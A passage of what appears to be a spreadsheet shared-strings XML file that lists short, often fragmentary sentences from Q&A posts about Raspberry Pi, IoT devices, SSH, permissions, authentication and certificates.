    <t>Does this mean I have to build my own firmware if I need wifi.suspend() enabled?</t>
  </si>
  <si>
    <t>I came across the AWSIoTKeychain class but I not sure how to use it.</t>
  </si>
  <si>
    <t>disable password authentication).</t>
  </si>
  <si>
    <t>(This user doesn't even have sudo access by default.)</t>
  </si>
  <si>
    <t>That's why there is an unreachable statement.</t>
  </si>
  <si>
    <t>so you need to disable mobile data .. then arp-scan will work.</t>
  </si>
  <si>
    <t>I would use  or sudo -u $LOGIN $CMD.</t>
  </si>
  <si>
    <t>So, you must enable the ssh service on your rpi.</t>
  </si>
  <si>
    <t>As root do:
usermod -a -G dialoutyourusername
Then log out and back in so you get the new group.</t>
  </si>
  <si>
    <t>RP is a linux system I think so permission errors can be resolved with .</t>
  </si>
  <si>
    <t>Python: 3.2
PyUSB 1.0
Endpoint is a HID device.</t>
  </si>
  <si>
    <t>device_type is the type of the device specified when registering the device.</t>
  </si>
  <si>
    <t>DIR is the mcrypt install directory.</t>
  </si>
  <si>
    <t>If you do that from a system directory you could totally cripple the system.</t>
  </si>
  <si>
    <t>You need hardware with a USB device controller and then implement the HID device class.</t>
  </si>
  <si>
    <t>You need to invalidate your I-cache and D-cache separately.</t>
  </si>
  <si>
    <t>You need to build the firmware yourself.</t>
  </si>
  <si>
    <t>You've not enabled TLS - you'll need to use  to pass the CA certificates to trust.</t>
  </si>
  <si>
    <t>snd never gets cleared.</t>
  </si>
  <si>
    <t>: You might need to provide +x permission on the script (chmod).</t>
  </si>
  <si>
    <t>And go to Menu 7 -&gt; Menu A4 and enable SSH.</t>
  </si>
  <si>
    <t>Alexa enabled headless devices do the authentication using an companion app running on Android or iOS.</t>
  </si>
  <si>
    <t>could be hidden ESSID Networks.</t>
  </si>
  <si>
    <t>I suspect that your firmware does not have SSL/TLS enabled.</t>
  </si>
  <si>
    <t>You have also not declared keypad anywhere.</t>
  </si>
  <si>
    <t>EnqueuedTime is a property that is stamped by IoTHub only when it receives a command destined for a Device.</t>
  </si>
  <si>
    <t>You can't alias objects like that.</t>
  </si>
  <si>
    <t>Please try to use List Keys to get the key.</t>
  </si>
  <si>
    <t>Change the "Name" property to "AuthenticationLevel".</t>
  </si>
  <si>
    <t>Connect to Raspberry SSH as user pi, and execute this:</t>
  </si>
  <si>
    <t>In Raspberrypi/linux system, You can only use the GPIO with root authority by default.</t>
  </si>
  <si>
    <t>by default ssh is disabled but this might help.</t>
  </si>
  <si>
    <t>I. Login to your user on the Raspberry Pi (I'm using the default user pi).</t>
  </si>
  <si>
    <t>You should use this command MAV_CMD_DO_FENCE_ENABLE to enable or disable geo-fence.</t>
  </si>
  <si>
    <t>Otherwise you'd need to build a mobile companion app which you use to authenticate the user.</t>
  </si>
  <si>
    <t>There is no need to configure x509 securities in your lambda.</t>
  </si>
  <si>
    <t>If not- if you own RPI3 then login into the default account(password: raspberry) and do sudo adduser [yourname] -g sudo.</t>
  </si>
  <si>
    <t>If it's a third party gamepad it probably won't work through hid-sony.</t>
  </si>
  <si>
    <t>Defaults to None, which indicates no authentication is to be used.</t>
  </si>
  <si>
    <t>Protection is not enabled."</t>
  </si>
  <si>
    <t>You may use chmod in the same way as on Linux, set 700 for .ssh directory and 600 for authorized_keys.</t>
  </si>
  <si>
    <t xml:space="preserve">
Does this mean I have to build my own firmware if I need
  wifi.suspend() enabled?</t>
  </si>
  <si>
    <t>However, there is a recommended work-around without sacrificing your security.</t>
  </si>
  <si>
    <t>But I worked out this, with help of the pwm-2chan.dts:
Then your driver will be probed:</t>
  </si>
  <si>
    <t>It does some network initialization that the Arduino Core will also do.</t>
  </si>
  <si>
    <t>If a system does not respond the watchdog triggers.</t>
  </si>
  <si>
    <t>You will need to fix the input to be valid XML.</t>
  </si>
  <si>
    <t>Recommend to insure x &lt;= 32767</t>
  </si>
  <si>
    <t>You can copy those into your project and use the cpp file to do further hacking.</t>
  </si>
  <si>
    <t>Sieves are a type of algorithm used e.g.</t>
  </si>
  <si>
    <t>Symfony's security system works by determining who a user is (i.e.</t>
  </si>
  <si>
    <t>eCryptfs has been derived from Erez Zadok's Cryptfs.</t>
  </si>
  <si>
    <t>Example of listing permissions for a certificate</t>
  </si>
  <si>
    <t>To see all "unchecked" warnings, recompile with -Xlint:unchecked.</t>
  </si>
  <si>
    <t>Thus, a user can keep the same login name, although the directory may be radically restructured.</t>
  </si>
  <si>
    <t>Toopher is usable security.</t>
  </si>
  <si>
    <t>An  element can be of type text field, checkbox, password, radio button, submit button, and more.</t>
  </si>
  <si>
    <t>Cache can also be cleared.</t>
  </si>
  <si>
    <t>The Dafny verifier is run as part of the compiler.</t>
  </si>
  <si>
    <t>Password wallet
To-do lists.</t>
  </si>
  <si>
    <t>However, it also works if Service Broker is not enabled.</t>
  </si>
  <si>
    <t>The Login Button uses a scope or data-scope parameter on the fb:login-button element.</t>
  </si>
  <si>
    <t>Various types of authentication using Google account.</t>
  </si>
  <si>
    <t>To disable that, use LSAN_OPTIONS=detect_leaks=0.</t>
  </si>
  <si>
    <t>See Amazon EC2 Security Groups</t>
  </si>
  <si>
    <t>No Hacking please!</t>
  </si>
  <si>
    <t>For files, use hidden-files.</t>
  </si>
  <si>
    <t>404.9  File attribute hidden.</t>
  </si>
  <si>
    <t>a User model with username and password fields).</t>
  </si>
  <si>
    <t>http://www.imada.sdu.dk/Courses/DM18/Litteratur/IntelnATT.htm More about Intel vs. AT&amp;T syntax.</t>
  </si>
  <si>
    <t>Define your keys in one place, use value types easily, and get extra safety and convenient compile-time checks for free.</t>
  </si>
  <si>
    <t>I made surveillance webcam for my parents using the Raspberry Pi, but they managed to break the SD slot somehow.</t>
  </si>
  <si>
    <t>I have added the line:
www-data ALL=NOPASSWD: /usr/bin/python /home/pi/lampon.py
which should give the apache user privileges to run the python script at least for turning on the power socket but it doesn't work.</t>
  </si>
  <si>
    <t>I want to make an application which can receive data from Android Device and run preexisting scripts based on it without using ssh, if possible.</t>
  </si>
  <si>
    <t>And, according to my experience, the mechanical part is the worst: designing and building the safe (I used plexiglass) was the worst thing.</t>
  </si>
  <si>
    <t>It will maybe execute some arbitrary code before it finds an invalid opcode, but that's not enough to make the CPU explode or the module to be damaged.</t>
  </si>
  <si>
    <t>Pair to the discovered device separately from making any attempts to read the characteristics.</t>
  </si>
  <si>
    <t>You need to open your .csproj and add proper runtime identifiers for release.</t>
  </si>
  <si>
    <t>Gotcha #1 - Update Bluez
The bluez package does support HID over GATT and some fixes were made along the way.</t>
  </si>
  <si>
    <t>There are multiple reasons for this to happen,
If you are on linux or mac, make sure you have write permission to the port.</t>
  </si>
  <si>
    <t>Tried to import the cert to the user who is logging in (not using the root) using the crontab through a startup script.</t>
  </si>
  <si>
    <t>F# Make (FAKE) is an open-source build automation system.</t>
  </si>
  <si>
    <t>GreaseKit is a SIMBL (a patching tool for Cocoa apps) plugin, that adds user scripting to Safari, Mailplane, Diet Pibb.app and all WebKit applications.</t>
  </si>
  <si>
    <t>The program said that it 
expected declaration before '}' token
but I am not sure how to fix this.</t>
  </si>
  <si>
    <t>^C
dev@dev2:~/dev2$
AWS Security Policy:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "iot:*",
      "Resource": "*"
    }
  ]
}</t>
  </si>
  <si>
    <t>It looks like the use/requirement of TLS mutual authentication (via certificates), versus the use of AWS SIGv4 headers, is determined by AWS IOT based on the port used.</t>
  </si>
  <si>
    <t>By default, ActsAsTree expects a foreign key column called parent_id.</t>
  </si>
  <si>
    <t>In all versions of SSH it is important to verify unknown public keys, i.e.</t>
  </si>
  <si>
    <t>Note however, this is far from production quality, or secure!</t>
  </si>
  <si>
    <t>I want the script to run when logging in locally but not when I use SSH.</t>
  </si>
  <si>
    <t>For reference, the networks that I noticed would work with or without this field would have the key_mgmt=WPA-PSK if I logged in via the RPi's desktop GUI.</t>
  </si>
  <si>
    <t>Well, btmon could not be my solution as device discovery needs to be triggered with  which does not have a recurrence parameter (only hcitool scan has).</t>
  </si>
  <si>
    <t>Probably you need to add some delay before running your script to allow for the SSH service to come up.</t>
  </si>
  <si>
    <t>Add mod_proxy too your list of included modules in lighttpd.conf i.e:
Then you can redirect requires to 443 (https) somewhere else.</t>
  </si>
  <si>
    <t>MY_Controllers
MY_Controller provides 4 different controllers that you can use to keep common functions within each 'zone' of your website: Base_Controller, Front_Controller, Authenticated_Controller and Admin_Controller.</t>
  </si>
  <si>
    <t>The LoginView control allows you to display different information to anonymous and logged-in users.</t>
  </si>
  <si>
    <t>For security reasons, because they run in their own process space, they run a different version of Webkit and use a different Javascript engine.</t>
  </si>
  <si>
    <t>The C++ server-side API additionally allows for customized authorization, state processing, protocol handling, commands, render loop handlers, event handlers and tone-mapping code.</t>
  </si>
  <si>
    <t>After typing in my password of my pi, nothing is happening anymore.</t>
  </si>
  <si>
    <t>I logged in using su and typed my password.</t>
  </si>
  <si>
    <t>You can use HID, serial or CDCACM class.</t>
  </si>
  <si>
    <t>It may not be the only problem, but  is uninitialized when you pass it to cvCvtColor.</t>
  </si>
  <si>
    <t>Now you have a SerialPortKeyUp event to register; to do so, type this down somewhere
 SerialPortKeyUp += KeyUpCallback;</t>
  </si>
  <si>
    <t>Isabelle is a generic proof assistant, with Isabelle/HOL as main instance.</t>
  </si>
  <si>
    <t>crypt(3) is a Unix C library function used for hashing passwords.</t>
  </si>
  <si>
    <t>If the system defaults are different, then your decryption will fail.</t>
  </si>
  <si>
    <t>If the user is logged in, execute the
  view normally.</t>
  </si>
  <si>
    <t>All the libraries are possessed and registered.</t>
  </si>
  <si>
    <t>The thing is that I get this error:  
The command executed on master node:
The result:
I've used SSH Keygens between the master and each slave so, there is no need to use the password to login between each node.</t>
  </si>
  <si>
    <t>The  can only be access as root by default.</t>
  </si>
  <si>
    <t>When I use SSH I also can't find the directory.</t>
  </si>
  <si>
    <t xml:space="preserve">
I tried to create a HID over GATT device with Windows IoT Core on my Raspberry Pi 3.</t>
  </si>
  <si>
    <t>Also in Device Manager doesn't appear at all , not even as an unknown device.</t>
  </si>
  <si>
    <t>Checked Enable Windows IoT Remote Server in Device Portal.</t>
  </si>
  <si>
    <t>I was able to SSH into RPi and execute commands.</t>
  </si>
  <si>
    <t>My question is how to enable watchdog kernel module bcm2835_wdt for raspberry pi3 ?</t>
  </si>
  <si>
    <t>I am getting EXC_BAD_ACCESS crash that occurs in the AudioToolBox.</t>
  </si>
  <si>
    <t>Where a user scans, and it will put it on the user_id field.</t>
  </si>
  <si>
    <t>I'm using BearSSL from the Arduino provided Librarys, namely the class WiFiSecureClient.</t>
  </si>
  <si>
    <t>This error is most likely due to an unknown or inactive certificate.".</t>
  </si>
  <si>
    <t>I want to access it as 'pi', but I cannot execute the mount command unless I am root.</t>
  </si>
  <si>
    <t>/etc/profile.d is the only directory where SSH executes the banner.</t>
  </si>
  <si>
    <t>I am building a home surveillance system using Raspberry Pi and OpenCv.</t>
  </si>
  <si>
    <t>Mar  2 22:08:59 raspberrypi systemd[1]: Reloaded OpenBSD Secure Shell server.</t>
  </si>
  <si>
    <t>The scan in command-line worked but the script keeps telling me that no devices are discovered.</t>
  </si>
  <si>
    <t>There is a tool to sign the driver.</t>
  </si>
  <si>
    <t>However, when i tried to run the script directly I got a permission error.</t>
  </si>
  <si>
    <t>You can find a list of devices on your network by investigating your arp cache.</t>
  </si>
  <si>
    <t>Also you may have a look at anonymous pipes.</t>
  </si>
  <si>
    <t>First, you create a 'git' user and a .ssh directory for
  that user.</t>
  </si>
  <si>
    <t>Maybe you could use SSH, with Fabric for instance.</t>
  </si>
  <si>
    <t>AppArmor will block execution for files not white listed.</t>
  </si>
  <si>
    <t>Type safety should be handled by the compiler.</t>
  </si>
  <si>
    <t>But if someone (and just one) will login the Pi, you could start the script from the .</t>
  </si>
  <si>
    <t>A guy used it here
I don't think it has been enabled in nodemcu firmware.</t>
  </si>
  <si>
    <t>SoftwareSerial is very susceptible to interrupts from other sources.</t>
  </si>
  <si>
    <t>The default preferences are for "Auto Login" "Login as user Pi"
This means that the :0 session is already taken.</t>
  </si>
  <si>
    <t>Once you connect the ESP8266 stores the password internally, you don't need it to re-connect after that, you just omit the password argument or pass nil.</t>
  </si>
  <si>
    <t>Input your SSID name and password for your hidden network.</t>
  </si>
  <si>
    <t>Very often, bots are iot devices with upnp enabled and DEFAULT admin login unchanged.</t>
  </si>
  <si>
    <t>There is a good example: How can I get a String from HID device in Python with evdev?</t>
  </si>
  <si>
    <t>So to enable sshd for one boot .</t>
  </si>
  <si>
    <t>If ssh is enabled on your raspberry (which is normally the case) you could use .</t>
  </si>
  <si>
    <t>After that, it should persist until the user clears their cookies.</t>
  </si>
  <si>
    <t>Only when I renamed to Encryption.h, Encryption.cpp and Encryption as the class name did it suddenly start working.</t>
  </si>
  <si>
    <t>/etc/network/interfaces does not need to be modify by you if you need to connect to your hidden network.</t>
  </si>
  <si>
    <t>GeckoDriver is having executable permission for non-root users.</t>
  </si>
  <si>
    <t>ChromeDriver is having executable permission for non-root users.</t>
  </si>
  <si>
    <t>Lol, the problem was actually that I hadn't cleared my browsing data on chrome.</t>
  </si>
  <si>
    <t>COM3 is already opened by SceneManagement , so when others asks to access COM3 will occur access deny.</t>
  </si>
  <si>
    <t>You can give it execute permissions using:
sudo chmod +x pypy3 # But you have to be in the /bin directory!</t>
  </si>
  <si>
    <t>You would use an NFC enabled Apple Wallet pass.</t>
  </si>
  <si>
    <t>These cookies are not accessible via JavaScript.</t>
  </si>
  <si>
    <t>Data security also protects data from corruption.</t>
  </si>
  <si>
    <t>Phantom DSL is the reactive type safe Scala DSL For Apache Cassandra and Datastax Enterprise.</t>
  </si>
  <si>
    <t>ActiveRecord Mixin for Safe Destroys</t>
  </si>
  <si>
    <t>QPointer is a Qt class which provides guarded pointers to QObject.</t>
  </si>
  <si>
    <t>CNContact is a thread-safe class for Apple architectures (MacOS, iOS, watchOS, etc.)</t>
  </si>
  <si>
    <t>RADIUS is Remote Authentication Dial In User Service, a protocol that allows for different management types.</t>
  </si>
  <si>
    <t>Zenbot is a command-line cryptocurrency trading bot using Node.js and MongoDB.</t>
  </si>
  <si>
    <t>Browser APIs specified in the WICG Trusted Types proposal</t>
  </si>
  <si>
    <t>X509Certificate is the name of .NET and Java classes for handling X.509 certificates.</t>
  </si>
  <si>
    <t>The default location for this file is [jre home]/lib/security/cacerts.</t>
  </si>
  <si>
    <t>By
  default only the cookie is saved.</t>
  </si>
  <si>
    <t>Login Shells (.bash_profile)
A login shell is a bash shell that is started with - or --login.</t>
  </si>
  <si>
    <t>This class provides a concrete implementation of CookieHandler.</t>
  </si>
  <si>
    <t>The hash has been recommended by the NESSIE project.</t>
  </si>
  <si>
    <t>A keyed archive is encoded as a hierarchy of objects.</t>
  </si>
  <si>
    <t>Type-safe.</t>
  </si>
  <si>
    <t>Information on the control targeted by the user.</t>
  </si>
  <si>
    <t>And at the end, a link to TAGE branch predictors used on modern Intel CPUs.</t>
  </si>
  <si>
    <t>has built-in methods for working with arrays and hashes
Project at githug: https://github.com/mquan/cortex</t>
  </si>
  <si>
    <t>The unsafe functions include memcpy, mempcpy, memmove, memset, stpcpy, strcpy, strncpy, strcat, strncat, sprintf, snprintf, vsprintf, vsnprintf, and gets.</t>
  </si>
  <si>
    <t>A JComboBox (drop down list) to choose from a list of available authentication servers.</t>
  </si>
  <si>
    <t>Sanitize is a whitelist-based HTML and CSS sanitizer.</t>
  </si>
  <si>
    <t>From the Android Document
Use getSystemService(java.lang.String) with argument FINGERPRINT_SERVICE to get an instance of this class.</t>
  </si>
  <si>
    <t>Other documents are still being worked on within the OAuth working group.</t>
  </si>
  <si>
    <t>For all others, use tampermonkey, if it applies, or userscripts.</t>
  </si>
  <si>
    <t>On the top, you have a root like C:\ in windows systems.</t>
  </si>
  <si>
    <t>There isn't official documentation for GAS's intel-syntax.</t>
  </si>
  <si>
    <t>Deriving a key from a password is as specified in RFC1320 and FIPS46-2.</t>
  </si>
  <si>
    <t>You may be accidently skipping the valid codes.</t>
  </si>
  <si>
    <t>If you've got a logged-in user, then the login script for that user must have run.</t>
  </si>
  <si>
    <t>The filename is a valid file.</t>
  </si>
  <si>
    <t>The command ID can be any string that is valid in the MQTT protocol.</t>
  </si>
  <si>
    <t>This is because broadcasting works very differently on the XBee ZB modules than with the XBee 802.15.4 modules.</t>
  </si>
  <si>
    <t>Im trying to compile an example from the Cryptosuite for Arduino.</t>
  </si>
  <si>
    <t>Wondering if it has something to do with the hmac encryption function?</t>
  </si>
  <si>
    <t>I forgot user and password for login.</t>
  </si>
  <si>
    <t>Is there a security reason for that ?</t>
  </si>
  <si>
    <t>Could be Arm / intel ?</t>
  </si>
  <si>
    <t>How can I attach the ssh key to my python script?</t>
  </si>
  <si>
    <t>If you just want to  into the directory, change to root with sudo -i.</t>
  </si>
  <si>
    <t>SHA-512 is a cryptographic hash,  a one way function.</t>
  </si>
  <si>
    <t>Not only access to /dev can be privileged for access, also the device itself will probably be protected.</t>
  </si>
  <si>
    <t>To re-enable the port just type in sudo ifconfig eth0 up
And to view the names of all adapters type in sudo iwlist scan probably a better way of doing this but this has been working for me.</t>
  </si>
  <si>
    <t>This SDK also functions as an API key that will connect the device with a KAA server (on a KAA server named with Application Token).</t>
  </si>
  <si>
    <t>The clientId for a device is of the form 'd:orgId:deviceType:deviceId' where deviceType and deviceId are the values you specified when you registered your device.</t>
  </si>
  <si>
    <t>It was only registered once at the start.</t>
  </si>
  <si>
    <t>Hono and Ditto got connected once I changed the password to foobar.</t>
  </si>
  <si>
    <t>This API is accessible only by TLS/SSL.</t>
  </si>
  <si>
    <t>The only solution I can think of is also one I really don't recommend, since it will make the code somewhat obfuscated and hard to read and maintain, and that is using pre-processor macros.</t>
  </si>
  <si>
    <t>Most common are network based attacks that send to the target machine a huge number of artificially crafted requests.</t>
  </si>
  <si>
    <t>Kernel bypass: userspace processes can submit operations directly to the network adapter hardware without any system calls.</t>
  </si>
  <si>
    <t>This would tell me that there is nothing wrong with my home network or the network at work, and it also makes me think that this has nothing to do with the pi, since other computers can resolve the hostname to the ip address and successfully login.</t>
  </si>
  <si>
    <t>The API level exactly identifies the version of the libraries that your app can call into; it identifies the combination of manifest elements, permissions, etc.</t>
  </si>
  <si>
    <t>A common approach in situations like this to provide the application with some external access point (e.g., an HTTP server) that can be probed.</t>
  </si>
  <si>
    <t>You might be able to add the account PHP runs as to the sudoers file, although it's a pretty huge security risk.</t>
  </si>
  <si>
    <t>Amazon Machine Learning adds predictive abilities to application such as fraud detection, demand forecasting, targeted marketing, and click prediction.</t>
  </si>
  <si>
    <t>For some reason, however, after the processing function returns, the array can only be accessed once before it appears that the values become corrupted.</t>
  </si>
  <si>
    <t>The portals authentication is built and passed in the request and the wifi Key is encoded in base 64.</t>
  </si>
  <si>
    <t>I added both these addresses to the c12 register in their corresponding worlds(Secure / NS).</t>
  </si>
  <si>
    <t>Remember that the UART can present a login prompt, so make sure that's disabled too.</t>
  </si>
  <si>
    <t>Leaving it set to NoPadding is not secure since any old garbage can be added to the decrypted plaintext.</t>
  </si>
  <si>
    <t>Therefore, having it receive data that isn't a valid URL would make the link useless.</t>
  </si>
  <si>
    <t>From time to time the String data get corrupted but not the other data types as far as I can remember.</t>
  </si>
  <si>
    <t>The strange thing is that it seems that my verification callback is not even called.</t>
  </si>
  <si>
    <t>This appeared to have to do with WiFi and Bluetooth Coexistence not being supported in versions of the ESP-IDF prior to the v3.1 beta.</t>
  </si>
  <si>
    <t>A Manually Built Login Flow should add the scope parameter to the login dialog URL that they redirect to.</t>
  </si>
  <si>
    <t>Defines the basic functionality of an identity object.</t>
  </si>
  <si>
    <t>Here's an example that makes a call to the Google Calendar API: 
The library makes authentication easier.</t>
  </si>
  <si>
    <t>If the arduino or linux is throwing the errors, most likely the PHP script is locking the data.txt file.</t>
  </si>
  <si>
    <t>After decryption, header.type = 1 and _buff still = C0010000 so it would seem there is an error in my memcpy'ing but I can't find it.</t>
  </si>
  <si>
    <t>I have a python3 script on my computer that I can run with  and that works, I tried to use it on my Raspberry and something fails with message Illegal instruction.</t>
  </si>
  <si>
    <t>It's the linux kernel who creates character devices per default with no user permissions.</t>
  </si>
  <si>
    <t>The **LoginView** control allows you to display different information to anonymous and logged-in users.</t>
  </si>
  <si>
    <t>If the verification fails the application gets rejected and will not be installed on the device.</t>
  </si>
  <si>
    <t>My code:
What I get: 
Initializing SD card...initialization failed.</t>
  </si>
  <si>
    <t>I build my own locking system, but it fails when flooded with messages.</t>
  </si>
  <si>
    <t>It seems like bluetooth is Soft Blocked and added in rfkill list.</t>
  </si>
  <si>
    <t>I made small java app for logging users by ID.</t>
  </si>
  <si>
    <t>Today I want to install a hidden service on it.</t>
  </si>
  <si>
    <t>It will be much easier if you have installed Raspbian with enabled ssh on microSD card.</t>
  </si>
  <si>
    <t>Notice the section of code for 
var edge_ca_cert_path = '[Path to Edge CA certificate]';
Node JS Downstream Application</t>
  </si>
  <si>
    <t>Before running  , run
And then:
python -m pip install --upgrade google-auth-oauthlib[tool]
google-auth is a dependency of google-auth-oauthlib in Raspbian</t>
  </si>
  <si>
    <t>Also, with a few lines of configuration, you can enable safe deployments through CodeDeploy, and can enable tracing by using AWS X-Ray.</t>
  </si>
  <si>
    <t>The Raspberry starts directly to a bash without password oslt.</t>
  </si>
  <si>
    <t>Our current method involves using SSH and Ansible.</t>
  </si>
  <si>
    <t>or does this have something to do with the cognito identity created from a docker instance?</t>
  </si>
  <si>
    <t>If you want to try, just plug the RPi and try to make an SSH, by checking your LAN devices.</t>
  </si>
  <si>
    <t>You can use GetIsNetworkAvailable method of NetworkInterface class to check whether internet connected or not.</t>
  </si>
  <si>
    <t>Nonetheless, most crypt(3) implementations still include it for the sake of backwards compatibility.</t>
  </si>
  <si>
    <t>django-login refers to django built-in auth system.</t>
  </si>
  <si>
    <t>A voter is a dedicated class that checks if the user has the rights to be connected to the application.</t>
  </si>
  <si>
    <t>I have tried running the python program with and without sudo privileges and it didn't help.</t>
  </si>
  <si>
    <t>I can't registrate a interupt event on an HID input device.</t>
  </si>
  <si>
    <t>When Windows Authentication is selected, does it use the current windows user?</t>
  </si>
  <si>
    <t>I see evidence that Intel, IBM, and others have builds for their platforms with bmcweb.</t>
  </si>
  <si>
    <t>Try disabling safe mode.</t>
  </si>
  <si>
    <t>To have the python file executed with root permissions, either
use something like gksudo python program.py.</t>
  </si>
  <si>
    <t>Regardless of which library you use, you also need to check whether the data is valid.</t>
  </si>
  <si>
    <t>Paste the following code in .htaccess file on root.</t>
  </si>
  <si>
    <t>Usually this is within the Windows.System.Profile.HardwareIdentification namespace.</t>
  </si>
  <si>
    <t>Can be found Debug -&gt; Properties -&gt; Authentication (Select 'None')</t>
  </si>
  <si>
    <t>From a security standpoint, it would be better to create a dedicated group (e.g.</t>
  </si>
  <si>
    <t>Prior to August 2016, the specification was closely guarded.</t>
  </si>
  <si>
    <t>Disabling SIP has potential of being dangerous, so I do not reccomend doing so.</t>
  </si>
  <si>
    <t>If it is found, SSH is enabled, and the file is deleted.</t>
  </si>
  <si>
    <t>You can take a look at Azure Certified IoT device catalogue and find out whether particular device is listed under that.</t>
  </si>
  <si>
    <t>Sometimes when copying node_modules from OS to OS the executable permissions get very confused.</t>
  </si>
  <si>
    <t>I just tried your code above from within a browser (Chrome 61) and it successfully listed the certificates and create new ones.</t>
  </si>
  <si>
    <t>The org id could be found accessing one of your devices details, it is the first Id in the list</t>
  </si>
  <si>
    <t>for that you must disable the access control on your computer.</t>
  </si>
  <si>
    <t>The unauthorizedexception is terribly misleading as what was missing was the following statement in c#:</t>
  </si>
  <si>
    <t>It should show amongst other information, the user and group who have permission.</t>
  </si>
  <si>
    <t>A software token is a type of two-factor authentication security device</t>
  </si>
  <si>
    <t>django-login refers to django built-in auth system</t>
  </si>
  <si>
    <t>python-magic is a python interface to the libmagic file type identification library.</t>
  </si>
  <si>
    <t>Anything related to Non-Disclosure Agreements (NDAs), i.e.</t>
  </si>
  <si>
    <t>It supports HTTPS and follows redirects by default.</t>
  </si>
  <si>
    <t>The user may also be allowed to type a (legal) value directly into the spinner.</t>
  </si>
  <si>
    <t>There is controversy because Sender ID is incompatible with existing specifications.</t>
  </si>
  <si>
    <t>Also, displayed information can be hidden with a click.</t>
  </si>
  <si>
    <t>I'm open to other suggestions to circumvent the use of sudo.</t>
  </si>
  <si>
    <t>Is there a proper way to scan a network for a device name?</t>
  </si>
  <si>
    <t>I used jsch to create a ssh tunnel to execute the script.</t>
  </si>
  <si>
    <t>In this file, a username is expected after the timespec, e.g.</t>
  </si>
  <si>
    <t>So out of no where I was unable to SSH into my headless linux box.</t>
  </si>
  <si>
    <t>But from other systems, I am unable to access.</t>
  </si>
  <si>
    <t>authblue-ui-ssr-spike@1.0.0 testcmp: `node scripts/testcmp`
npm ERR!</t>
  </si>
  <si>
    <t>I get an error -
The CN (common name) in the primary certificate is invalid.</t>
  </si>
  <si>
    <t>So i putted on_login_dialog_close function, actually.</t>
  </si>
  <si>
    <t>Both registered in the Loriot Server.</t>
  </si>
  <si>
    <t>But Note that security in BT was superior to BLE till BTv4.1 and same on BTv4.2.</t>
  </si>
  <si>
    <t>This is for security reasons.</t>
  </si>
  <si>
    <t>that is protected.</t>
  </si>
  <si>
    <t>If possible, use code that is both valid C and C++.</t>
  </si>
  <si>
    <t>An example is x.x, the identity function.</t>
  </si>
  <si>
    <t>The goal is that the iPhone app makes a request to an Arduino server and the server only processes it if it has the proper credentials of one form or another.</t>
  </si>
  <si>
    <t>Using json_encode() will ensure that the variables you pass to javascript will be properly escaped / encoded and quoted.</t>
  </si>
  <si>
    <t>I am attempting to get a custom HID device (currently running on a raspberry pi zero) to be recognised by a UWP app running on Windows 10.</t>
  </si>
  <si>
    <t>Be careful when you are setting the agent as 'device-owner' as there is no way to undo that expect resetting the device.</t>
  </si>
  <si>
    <t>Its purpose is to enable
 * detection of mismatched protocol versions (e.g.</t>
  </si>
  <si>
    <t>As i have understood the UWP applications is kind of sandboxed for saftey and stability reasons.</t>
  </si>
  <si>
    <t>Are you sure you are able to make your serial communication work fine without the watchdog part of the code?</t>
  </si>
  <si>
    <t>Like other headers, cookies must be sent before any output from your script (this is a protocol restriction).</t>
  </si>
  <si>
    <t>The Direct Line API implements an authentication mechanism that uses standard secret/token patterns and provides a stable schema, even if your bot changes its protocol version.</t>
  </si>
  <si>
    <t>I have enabled Private Google API access for a VPC and I use this HTTP proxy solution described to connect my offsite datacenter to the Google Cloud backend.</t>
  </si>
  <si>
    <t>I know that some XBee modules support an ATAS (Active Scan) command that will report on beacons seen, but I'm not sure whether the Series 1 supports that command.</t>
  </si>
  <si>
    <t>Microsoft SEAL implements the secure parameters recommended by the standard.</t>
  </si>
  <si>
    <t>Second, the application should have correct Authentication and Authorization attached to a user/group defined in IAM or Cognito.</t>
  </si>
  <si>
    <t>The Event Hub-compatible endpoint includes the primary key.</t>
  </si>
  <si>
    <t>The code listed above plus certain conditions can exhibit the buffer-overflow corruption.</t>
  </si>
  <si>
    <t>After I connect through wvdial in the way shown above, and disable all other internet sources I have no access.</t>
  </si>
  <si>
    <t>It probably tries to identify your browser by that, and then tries to figure out if you have JavaScript enabled.</t>
  </si>
  <si>
    <t>I transcribed it into a tag so we can have a better look:
You're trying to get username from the input element.</t>
  </si>
  <si>
    <t>The Digital Millennium Copyright Act (DMCA) is a United States copyright law that implements two 1996 treaties of the World Intellectual Property Organization (WIPO).</t>
  </si>
  <si>
    <t>When the Pi boots, it looks for
  this file; if it finds it, it enables SSH and then deletes the file.</t>
  </si>
  <si>
    <t>If no mechanism exists, then that is not a vector for hacking.</t>
  </si>
  <si>
    <t>Now I am unable to access my pi either by root or by user mode.</t>
  </si>
  <si>
    <t>I have applied a patent for my work and want to protect it.</t>
  </si>
  <si>
    <t>Removal of security transparent attribute.</t>
  </si>
  <si>
    <t>Note, however, that MailCore is not multithreaded so any calls made will potentially block and not every IMAP detail is abstracted away.</t>
  </si>
  <si>
    <t>Running it again does add the first Certificate again (and again) like it is not working.</t>
  </si>
  <si>
    <t>I've changed the permissions (chmod) of the BLE class file and tried running again w/out sudo, but that didn't help.</t>
  </si>
  <si>
    <t>I used this function to connect to mosquitto broker which using mosquitto-auth-plug with JWT authentication.</t>
  </si>
  <si>
    <t>I am using the 'AES-128-CBC' method on openssl_encrypt() function.</t>
  </si>
  <si>
    <t>Unfortunately, I cannot get password_verify() function to work.</t>
  </si>
  <si>
    <t>If you get a 0x03 before you expect it then you can discard the invalid packet.</t>
  </si>
  <si>
    <t>Make sure you have your Yun connected to the network.</t>
  </si>
  <si>
    <t>keyboard_leds is a variable delcared in usb_private.h.</t>
  </si>
  <si>
    <t>I don't see anywhere in your code where a  is registered.</t>
  </si>
  <si>
    <t>Again, protected inside the enclosure.</t>
  </si>
  <si>
    <t>protected method in android.app.Activity class</t>
  </si>
  <si>
    <t>Version 2.0 for OAuth.</t>
  </si>
  <si>
    <t>This also protects your SAMP server from crackers.</t>
  </si>
  <si>
    <t>It also has to be compatible with the USB protocol that prevents devices from operating without a connection made.</t>
  </si>
  <si>
    <t>Anyways I tried it and, for reasons I do not understand, after git prompted me for a username and password it said "Basic Authentication Failed".</t>
  </si>
  <si>
    <t>/sys/kernel/debug/gpio will be empty if there no GPIO device registered (warning: when I say GPIO device, I don't mean the piece of hardware, but rather the kernel representation of it).</t>
  </si>
  <si>
    <t>Device boots with defaults and I can log in via powershell as detailed in the MS docs.</t>
  </si>
  <si>
    <t>According to Microsoft (https://docs.microsoft.com/en-us/windows/uwp/packaging/packaging-uwp-apps):   
So as of now, I think it is impossible to run the Windows App Certification Kit on your Raspberry Pi.</t>
  </si>
  <si>
